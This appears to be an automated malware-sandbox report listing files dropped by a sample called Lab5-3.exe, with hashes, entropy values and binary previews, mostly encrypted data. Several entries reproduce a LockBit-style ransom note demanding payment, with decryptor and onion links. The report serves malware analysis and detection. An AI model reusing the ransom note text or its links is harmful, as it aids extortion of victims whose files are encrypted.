                                                                                                          MD5:83467F73A19AAAA8F636F3F7A006977F
                                                                                                          SHA1:0EF7404AEED0B4B76D152F62E7BCFCBB3EBD9ACD
                                                                                                          SHA-256:07B76748135EC7E9851862EA968571356F44C37FA4C8721A1B5CFE09A457E779
                                                                                                          SHA-512:3DE708C7458290A255CEC9CE674A51F069861FD4BE57A6B331FB1B7AC2A2A8022DB3795B7FF02984080BD8B2EF015D9C9EBD19B0C85537EA3F0E775FF742A4B0
                                                                                                          Malicious:false
                                                                                                          Preview:..+.I........`..G.v%.....D>.4B.L.2.6...h.F.EV...{....%}...#..(.~..P.....;_7......"..:C.U.....E<....jK.u.....~Oe.f>..*.KZ/.:..I..;..+...T.j.CDk.......w...;\DY&..]....m.ts.2.y....jF..)R..3....5.;..m.n.. >....u..Q.....cK+t..........q..FN'C0.A.Xj|.:........w......c4%.b[!.).;G*#....... .Q Jcn.G.....X.ZE.l..I<g. ...&...%<.S../..f"./2..&.B....-.=..E.;_.D..5Fw...d.#.....h\.:...32..Jw.....`....i.l..@*.E.c..l)...N4.....(eT/.....?...w(Y...-..U..S...d&.qW'..v..|...Q.....kJ.@BK$8.lUY;...}..m8!...._..#......k....s..]..~./..."m.=.err........F>.m..lf...N.M.t..?...R..).:Yx.....;d.t/.&..........1?..A8....i"..............^.....^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:zlib compressed data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):28592
                                                                                                          Entropy (8bit):7.994126466895903
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:enGWHBaXPreLLGRpHrecU4PvQLC09WBk/IFMY3YRqhGBvTimUcT7WoJVBuYXMr2F:Kv8lpLebOSqpFMY3YMhG9TimfJ1MrmZ
                                                                                                          MD5:A956CB2E2EE75D9DCE60EFD7AD137381
                                                                                                          SHA1:C61F086664148402CDCBFD97C214AB1B8BFEE0D7
                                                                                                          SHA-256:2BA82237FBF106EF403E08ADA53DD2A2528A32DF0514EED4584EF06AB04D618C
                                                                                                          SHA-512:652A939203871D6CB70B0B9040A648B6A64EC57A9E384312709D147BD4D35CAC4ADF7865D62358B2E623D26BD7A2B09BF025BE675193522285218E6D09BCDABA
                                                                                                          Malicious:true
                                                                                                          Preview:(.-w.h.jw........v"'Ez....).x......0.......--..g.><.-....{..^.(I...V./K...!J.Bp.N.(..2l|u...#.Z.C.5J.R.u.....k...1...^......<.z.7.\.S...P>......o..G+00...u<^...Q.B..y........a..PV.@,0.raZE..."td`p.ir......3...3.Q5B..|....&..j....M.I....Q.S.#...R......2e.?...../'..|X.....sU....s_.......^\....Z...%.....\}x... ^0{1>..`56..)...mW.=....'.].t....o\./......j.v.C..V./.^K...M|.9B|.:..\](.p.......<,v.7.|.h..|.w/.(R..._......I..J.M...PR...-....6.......w.......oV.........6Z.`......*......b..Ji...O,.Q..]P`....u...P{....`."... .."..b......|....zK...B.8f..K..7tc.[-...)C.i$7y.....<.Bc...TK2.%..,P.....SQ..\7..k......kpzU..4..p?.ZU3.ez..m.s..uY'....p.q=e)....guc-<.......?..7..L....'..s".y!..].(..........n..:+~.y.J).?F..n.A...T../..l.a.c....(,.-Tk...D..l0a..?L...8S=..Sd.:.M.U....~L.0.I).MK .9Hz....&.....__8.......rMok5x5UM.y...{..QQ....P.Tx...3[SIv).F......d.@.(...LX..B...B.8u.$..n....lNX.X.-G..L..#.;2.o|.IRv"z]...=.c..l...2...d!..DQ..y...Z.f...y.."Z
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3248
                                                                                                          Entropy (8bit):7.943897824574117
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:9zEjLJXIOLUxdIvAN6DGqf05c4UoR57iGHfUTid3hBaUoSGFcmeykEdEElU92i:9zSIOLULIM6DR05c4eGx0uKeY2ElUJ
                                                                                                          MD5:A750365C4DD2D4DBD8C592BF6EC8D2D6
                                                                                                          SHA1:788E245B13B636E67BDB9F8138EC171E23817ACF
                                                                                                          SHA-256:4D76AA04DAF9624948F40A9577541999FF9D7F14416548B9260AE1E682DCC2C5
                                                                                                          SHA-512:3903C1E455B65B3BBB0F55FC4D748B5520B821B558DE23AFA22C6DB7BB52BBDF3B3D6D544B56C6171031AF5DECBDCCD05B5D4D7CB607AF87AB99BD3930F1F13C
                                                                                                          Malicious:false
                                                                                                          Preview:^JS_A5~...4..T..~.P.a.<[.5DI..y8..%.d.0....p&.Xz..V....UV.|..La*iP..6S./&....q.....3.8...Wj....}..};.D=.W.\S...@K_.z.0.m.....O1.>QVU.)?#A........S!..........2.......k.?2c....:....L...X.....)p.q..p...<.x.."...m}A.8.,oxfu .&....i.=..)J?.5@..........G.c.....|.........4."Z....U..B..(..v[w.'.{...Ro]d.q...........f;@^..8.w[.?..V.1..^u'....x.}..K..........e..D8.$.y..kp..9:...k........C.m.4)".e#s......H.o.y.\).....^h......w....t.P..F,.E.[.>....e.>1u.r{9..........G....=..BH.i. .....Ap.).9.J.^t..,K;.}.....X.`/6....v$P....=..8V.Go.r...+.......OF.......2....]............;(.N.E.....&(.g..:. Az..v.R*...N./....}...L.... .J...........9Y.lw..AF.AT..'B@5.6.N.d...L~.)I..,.i...=`.26.`.B....6........)5B....p.....^%..z...%J...P........>..@...3..cC?k#.......+...eu.n+.....2.`..[u.f[.U~...5.f.YB..3..Z|..6.Z.R.*.A.v.^.~..*.d.b..Q...Z||m..lm...].k.....5..~_.3'.T.....3.DRq&.....d.[...PK=. P.7Ht\2.,.\'n....d..Z.0 'EXD..q7.#OcBr.fjb...`...a..-. .".a)..yFHWk+.....0Oh...=...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):616150
                                                                                                          Entropy (8bit):7.981720232785043
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12288:DuFE6khFStF3sM1ATSnKs8SNP+QSsTilM7jzmj8gNPEXoO0Tehfk:DN6kDOF3j6TrmPLTL7jzmwgNEXoO0TOM
                                                                                                          MD5:714C547CB62ED0066E9C4F6CB2F1F038
                                                                                                          SHA1:742C8CCDCDD94B43CA4B0EC96BAABD8546C6D804
                                                                                                          SHA-256:23EA0126BD2CDE318E5AA49ADF31C4492B69A8F7C949EB24F0E271DD496AB7B1
                                                                                                          SHA-512:FB1D9B6C53381FF3B481BAEAFEEB6D0599C52EB2DCA28C4940E66854EBB96271F2DD83EF91B04AB776ECEA02230D43BF6C2C1CB44E88459EC55AA5201261B29B
                                                                                                          Malicious:false
                                                                                                          Preview:.6 3sv.F1..0...X.#AZ...F..>^.Y..V.i....4.y..H.0.7..n.. -......c7-.......k..<..0.{.m..OJ.Z......xy.M.fe.tTd.....Z$.\._)?....]."...2..rw..dg[.fD.:}.._...'}2.[.o..Fc..,].W.t.....Lr.....'..S'.f..).d.t...q+mD..at|^......W.id.).?..b....._D~t.....h.....~...m.).U.F.b.l6h.A.q..V6Ct0..z....JO..`......YP..<mC...K.0kI.$....9u1C y$C..`.........i;.b...4J.".o.;*..Y[...5...F.HPL....x......`..m...f..........^...F..iX8._u..-.%R...y.*3.$I...(.`S....Y.P..K..j......yGy=kr.[.yv.va..p.....9.+'....F.Td..H.(........v.L._...\J.:..9.8.Ui.!...M..%D....,.IL.8. ......K.|$zb...g..v3....'...._W"..`.1mf.Q..&$.F.H.F$W.......Di^.<.nl5X..y.K...+..^.b.2p.h....F...nv.......t@...QV@&(@o0.....-.......=m.O..%.<....9>@..v.....{...Ly..~....Do.)7..vWtx...g.?."sA..f%S...I.5..h........=...............B.+....i.L....X.%..7.Y....C-..q.S...2.y!..0.d%.....,U".5P..'..R..T.. .<.9...Gq.\.Z..jx.......$..p..G)]|.B_.^.......'._..V.....T....@ ....aCu5r.B..cG..%......_..P..i..B..l...X...0o.j].f#
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):920061
                                                                                                          Entropy (8bit):7.970879332677983
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24576:iGYGtb1/RKMFR8+mZaSrvsvQt8aw8AbaMER6edhOLoJB:iGPZKMFRJmdwQO8kAjrOi
                                                                                                          MD5:7119E5750A026BC8BCDD3B3DD3F7B227
                                                                                                          SHA1:A0D60AFB1548ABD9304E0409F1B0A3909AB228D7
                                                                                                          SHA-256:81632E9E74F6AD945856609DA1C3E21B6F1DCCCFDA21D7B75D36DC4DE535B728
                                                                                                          SHA-512:137CF1D6D2BD0DDF5F48419AF135F57D1C1D4ACDA5C04F11E69AFA4A3A6E479992C03E235B854FE27DDEBD6B511ABD204241D753536DE15095D29E313BD24831
                                                                                                          Malicious:false
                                                                                                          Preview:..8.R...H.&q...W.b......"........D..S.._..KN.r*........nC....io...N......]\.K.....q":...[g(K...n.h.L....x..E.N.ux..."F..h9...t..!u.....>.a).U. .,..m..*xGu.....]....z4.6|7.HQ!_....Xu..X9.7T...|a.X.....(gE..P.,.....W#.4N...... .b/.7._..Cj&~^.*..:.......x....1.~Z.<....eSu.............g...~...fmB..s...6cN{WR.....F.D.p...i... 6.\.l.SRB.!h..S...q..j?B..(./`..f.z....)t9Bu..........J....r..=.'........2x....d..ze.J...u4~.ju.j.....#7.w.2....r.'./.\...*[..l.\..b*...........5......y......3U-....5...!W8{."..I..z. .....#F,/d...X.....qi..N.b.+X D/.......kPE..Jk.=.5.f..`.F....0..O"......}..+)2.....Cy....Ko.......+.D.{E].....n.^....d...1......S.7..8.FPJ-.p..G..&c(.^c..........].../.c.e..3I.e..".w...O....I"...v.2.....'g.._.\.}d...>..e...r.Q.J.ER^.zL...D...^.;N.s..p.d.....Y.....u...q.M...~f?!5.B..}.)l.....}5f...t.c>.E.../@.a.m..V..6.2..........(ez.:..W>..P7._...@..x..v....M]..r...a.QU.g-...L.m.r...I...-.]<..)Q.....\....g.#a#...P.9.J:..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):10452592
                                                                                                          Entropy (8bit):6.331463229433503
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:196608:Tmy5zwSv9AAyse6liXUxCGZHa93Whlw6ZRnGN:TmyyKlysTliXUxCGZHa93Whlw6ZRne
                                                                                                          MD5:201E86B8E5EC4743D6AF2C901F41CB8C
                                                                                                          SHA1:9131B9C40047FA38C41F6DB1218766DEE4104506
                                                                                                          SHA-256:B7675E52E6E9112AC52BBCB97205143A79A880AC37FD17A22BCE1CD9BC457ADC
                                                                                                          SHA-512:679BA0BEF9546E7BED8DDB846988495D7EE64F0085518DAC4F2A6D8FCDAF3709503912FEDE6EFF91D59FBB14144E22B36360A21C28E77D8B9FEE1E3435B28793
                                                                                                          Malicious:false
                                                                                                          Preview:..L....I...Zl..N.GnVk5..C..)#.<.QnL./...9......b..j...R.d.c.4..../.[...~..*Cq 9E..[.......GA.....F..'.........s..iz.x..f(J.8..Y.;..".....6..ycl1.?....z.(.*d.P....u.D..8-m...=.#.<..%='...{.e{...Xd?j0%.W.......j.[%..?.k...bch.9.e..|:Z.F.,}q}...}.p6.z..40...l....U...[..s...K..r.+.{..W..>....,..M..U'..0.RM%.......~.6...l...n......$Cd.$.dAA..r.j.A.A....I[D..Jv|.....6..v+...s....C..#q...-....-L.b.0.~P.....b....2z3.&w....t..:g.....(.h.H..<..}.........9.g..d...23....w..'fn..&..(R........c.....<B1....f.o!.<.fO...s.....4ECL..s....0..t`.B.....u&..u...Vp.%..0&.V...k..a-VC....r.|d.M..f..\.X..(K........E....N...;XU8...>6...|y..Vy..C.m.d......x..fw.t].*D.8..F.w......_mu..o...i(...n..AN...J.. ...Cck......~vK.-..dG.!.p9.... .lK..8..*....u.H.,.<..F/.".VO.I...j.sF.%u..v..;.......2.>zK.^...J.91..... .%.o(o.91.I:...[i.j.2.Dk.8N..j.V.F...f.{.....L.... F....+......Q.......9....O..?.r$... ..1a.....gH`.K1v..}9+.C.g......t...t...S<uR.6L.......a..%....r.!2..0...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):342506
                                                                                                          Entropy (8bit):7.7589106168803115
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:QhNUMtZTjakyDlG8s+dqzCmEf2QQ8r+9M3LoZDvMpxavJp8Nw/Z:Q1NaDsWkzRW2QQ8a6bqM7aoNwB
                                                                                                          MD5:4403F7380DC35CE7DD73ADE718D99FF9
                                                                                                          SHA1:79932AE2DC0128B73AFBF0C0B81D0F07FA8CD84D
                                                                                                          SHA-256:872C26AC8FE6D2D3E8257C01D44B2C8A52A2C6F76DCBFF0701B045047F5B609A
                                                                                                          SHA-512:516D69912478C958672BF900D587B50ED25C59E78B65941B31AA96192788E5D7B7E71F5E24F1EE2AD2331C7CF338AEA511D13C26F84E45D4A144EC170C13BB88
                                                                                                          Malicious:false
                                                                                                          Preview:92...g.&Z.8.1..E..)..?a..^B..9..=.....8.O...0....q.BM..1m.Up..k3..4..?`.O.3..0.V.."/8..t......5l......B.;......Q.........w{.t.k.J.0..FKoo.*N..?..~.l=.U.#.{.Gj.....3H.....w..uC..pk8....6.;.<.x4.JY...cs....{0.u.i..Y..p..Cc...k..?.....?.<.........0k"x....[..X..q<.l....n...~....C.P..6y..=.-...}.X.HC.....\...*7+.r.2..Ab.mj..M}K...kJ ..>..x..Z..2...l..E?.bQ.`.,..n.{].o,v.P.G.K.v....?.uk{...1..Q.d..x...u..f.. ....i?.rm1c): ...m.l./_....?.R.5.../m.05x..8.K3~.*{...V.r|V.,...zH5.0.{...!.n.t58.....<.6M3..*lV..}.~ z....:....<...J-...)......QP....P...e`^..#....m'...R.........d...%.$....%`..r/..kr.P>...r../+....RSi............V.){8Y..~.sVf.^..d.k.&.'.J...Z..*......W.r ..C.:.^.fP.......#.4x..v.?.....f..8...HQ.T..`.~.8..f..1:...v.n....m....?W.S0..}..."G...;n...pg.nR......z.R."......Z.....QM......S...|.6.E.)k....6.... /.....?.t|=.......[rN+y.x6qh -..b..y..X...5........l.....`.."t.]...Cw.x~.U.XRFB..{.+....x6..8..[..g...T...&.1.*=....=$.<V..B.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):7422412
                                                                                                          Entropy (8bit):7.997142712148208
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:196608:k+i9AF4cC5G05ix3m18orDhYVskrDIleMPXWSZ:7U64v85+BOVskrDlMPXfZ
                                                                                                          MD5:9AEA0516F5342307B2773008CEDD9DCE
                                                                                                          SHA1:EE2422E1C25B3BDAC86920FE153A7EA9BC925D66
                                                                                                          SHA-256:B211485C83EC754C2D2B0A2C9D49F6689D7293C06D0D33F761FD8178B912C663
                                                                                                          SHA-512:D29245103EDC463328ECF31763A03CCAE43E6DFAAFE211161E9883A25512C97E28CFB223DEB55A6E10B17964DC618FB6DD7CADC7541575A495661E3DFD6086A7
                                                                                                          Malicious:true
                                                                                                          Preview:.y.:....@O...&....+.rb.....;ok.`..L...kQ!.....A...b.,..... ...2..?.0r.`.?o.Y.a..L...V..3.q.u..o...M.....x.W...l.T_3o...."H.....f..c..V&...... .N.+|o...O...;.SNl..L.2.6.t+.k...U...T..x/=.)...O..OJ".&u....N............./..r_\n+/."...j...L.:.{.:.b.......6....x:u.....8.....lF.../.js....L{;|.?n.....C.V.g..9..*...S.......x..{..f...O........B.-......Z..T|r2zkRCv..h..4m.+..^b.).....(.........n^.&.....s...F6>..tQ....I.OXuh1^..tB...s.^.O W.5...0...sC.yNs.)-.$.?...kB.Z..|.>X.........y:.;).)".r(..*..^..9-..`iP..;......~-t.....s....R..".%H.]*x.0..6.`.//..a<..._.q...W..*.n.l.B..{...a..|..5....>....e\......n...)e..U.V...2...C]..%P.m.....|...u...T...j0p...aZ;p......@...R&..'.UT...\e#......r..L..QHP..W.HP.P3u...:=.Z....&m..V!.S$S.z..9....a...j..D...p....(........D...Gh..`.%C..B.x.%i./...j.:$v.8]2..ps..C.[.O./........s...v.X.l..6.;.w.....gXZ[....1.tV.E.s.r....Pm!.[..@......BYrp...4.x.d..2...,L.yx]AzB.......W....Ut$.2.|.D.l)w{...ba`.S../...N..&.A9.....a.."
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1664
                                                                                                          Entropy (8bit):7.883549095616405
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:c3QE+0QfIAXeXdHfUTid3hBaUoSGFcmeykEdEElU92i:cRQfPX62Gx0uKeY2ElUJ
                                                                                                          MD5:7229B602DB9BE365A7FDB0949B575916
                                                                                                          SHA1:7D3E9E48C495B09F6A9B50F5951A6FC8283858F2
                                                                                                          SHA-256:8D9E2DC22820BA76DBBABCB57B872BF75ACD1469F3ECE0FF5BCA56A3EC1CE27F
                                                                                                          SHA-512:724D159F777C6FAE4F5F1A6711AA0B8674DF74AD4BEF800CBD23DC7903DF68067194732B916C6B279072FF08F2BF080523580E789CE09F49E83E67441B6A3232
                                                                                                          Malicious:false
                                                                                                          Preview:...]....,.5...L.@Y....8]......3.....o.0D........NL/}..$...a...+OV.y*c.f..e.R.....E^.]..Ac2.%.x.v...O$..T-;OX`.V.wo..m.E.3)fk.@.(...?(.(Q.......\....'%..li...%N...M.op.G.5..."..........W.I....E]z.K.*.$.v.j.bk`..OQMk.-.l.1....;..}._g|...........b..e..V..C.H...&..{..@......__..S.S..w..x..Fg..a.E.9wg`.S&[.............=......S..r.FeF..eN0.....P..mt....^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8V).....\..9....7$l/......@...3.o..7~...{.1..jD!'......9.nz.6o.....=...?...p......X...#......?.o.Y.q..o-.A^.&...=.G.....3(...<...W....<..JQ...+...5-v{...i.b....j
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1760
                                                                                                          Entropy (8bit):7.90163048120897
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:HA3q2Jrb3pdufg/kHfUTid3hBaUoSGFcmeykEdEElU92i:gPhZdumjGx0uKeY2ElUJ
                                                                                                          MD5:F85AD424C79C233F5492AEBFEB0F2208
                                                                                                          SHA1:039EB273D8AA56B65E2DD773D25EE5472D8B5A78
                                                                                                          SHA-256:29D5920B22947218D85CF2488E5ACAC8AA300B78BD759F6DD5953BEAF77D2E5B
                                                                                                          SHA-512:378630223E7BCB5A1AD15A725FD1BC9F79565D0B67660891AAA2930D473D04ED158EFC88B9D2A6A130055C4CB032C6E8588202761C71A47A187D361C1A7027B6
                                                                                                          Malicious:false
                                                                                                          Preview:T..n...`......f..243...1.zJ#.1.C....,...-4......N.=..R.../)...D....=.>.C....#..u.....D...^.-.....Z9...9....}.[w..FB...*.uIW...,"r[.3y.||...r3.8A.iS.....X...X..z...Nc..,..../....j&:8xT........%f...,.m.<....z.4.v\.C;..X.&n.L.1...@......s......-vp..O..w.L...Y.e..Nl.v.....{.......K..3..'.QT........p.U....1.:{....>!....@..P,..X.Kf.....a1.....-..GD...7.k...%......MI..A..m.........4g....MN9."W...#..,k.T..,[<...K..Y~..1..T..8...?.....uk..c.....qW=...^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8V).....\..9....7$l/......@...3.o..7~...{.1..jD!'......9.nz.6o.....=...?..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4496
                                                                                                          Entropy (8bit):7.9605326232756575
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:Rs9jTD5DjZqOXSqmEDZrnYFr61n4SRox0tslw5VY9b7BGx0uKeY2ElUJ:Rs97Zr7mEhn0r61NRoxBl8Gl60Cb
                                                                                                          MD5:CC9F6A4AD76FF3BCA24A1B9417B91D8A
                                                                                                          SHA1:A290914D210188562D9EE347DB335FEAF60E3720
                                                                                                          SHA-256:8FFDE3A2B29D1679797CD9F55DF175CB67973E73C6D5F7621E01F42C27558543
                                                                                                          SHA-512:130D90EBFEC87E266CD22508011A83752BFA2A62AB0432AF6A16505EC5D8794AF3330BA1DAA33B921C406C720860CC5BBFB712CB6AD59AC15129C97D049AB30F
                                                                                                          Malicious:false
                                                                                                          Preview:E.q..;sb.~..2@.....l[..8W.WDX.....fo.r..j.#.._A....S....gO.'.A..-.....y..E.........?....~m...g.D.h.......D/......'T......'.v.}[y../.-.A(.NL..FJ..X.Z...zYY...0.d.H..V.u.L!.R..0F..Q}.+7]..k5..................2...t.n.7p..I^.T{.[....:.<8....`.....B..E.n.*d.h..Y..6...s"...wY..:[v..k..\.........7...'..!.......p.....j....A.#...X.K....,..(.......*..DS...V.h3....,)..%..M.9Tx...f.~u..il~#v.Q.@....!`>.4.O^..;.|e.O.....BI..y.W.j....$..5xiDiF...A..t;..(..v=.2.....D'....`...}.G#..r./z.?s.bSWlt...;.w.AL0 ...}.F...My..}.....D.K..^j.....P...~ZQ....t....XIs9X...e...=S...g.+/..X........9.8`cBo|......_b.cr.#...`.c...@..G....+..\......,I...P5..v.@jp.).9.`.a.n...Y.+...X......S..........\..Jc...b........r....bM|.5dPdd]@.V...B.......}.[..F....X.N..c.o.Ma+&&....S..s...h..K..a.q_T.....aIfp.\.....N.<i.B.~.....}.4..._...._}....9.."........_I.J..D).\.._&.i.....=.%-.....1...).F. h.E....L.^..R,.S.'.N.s.k...z..~....3&Q.m{.6Y<.*....e....I..>lQ..`n.....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):315568
                                                                                                          Entropy (8bit):7.647626976860462
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:fBPziQp0wVRkOASETaj94CqvxJaZ6IrFtIRawmWYJ1MJSJwmZZ:fBbxpjVOO/jOCq59Ir3IkQY7IG
                                                                                                          MD5:B912D0387D58ED251FACDDA76984AD2E
                                                                                                          SHA1:5AC45A2F863FC6E0FC1A3BBA7C43D40CCC38AB77
                                                                                                          SHA-256:30B33F34456C6844C2BE6FF052266430FA354AF7423CD5C5C817EB35FF4C7085
                                                                                                          SHA-512:7579CA3FFD273DD18E7AD56E74875E490D36345F68EAD8078917AEA61DD801D724F8133C48A371D32B83DA1FFC761142D9B3FD92AD16AE3F50164FC43866155D
                                                                                                          Malicious:false
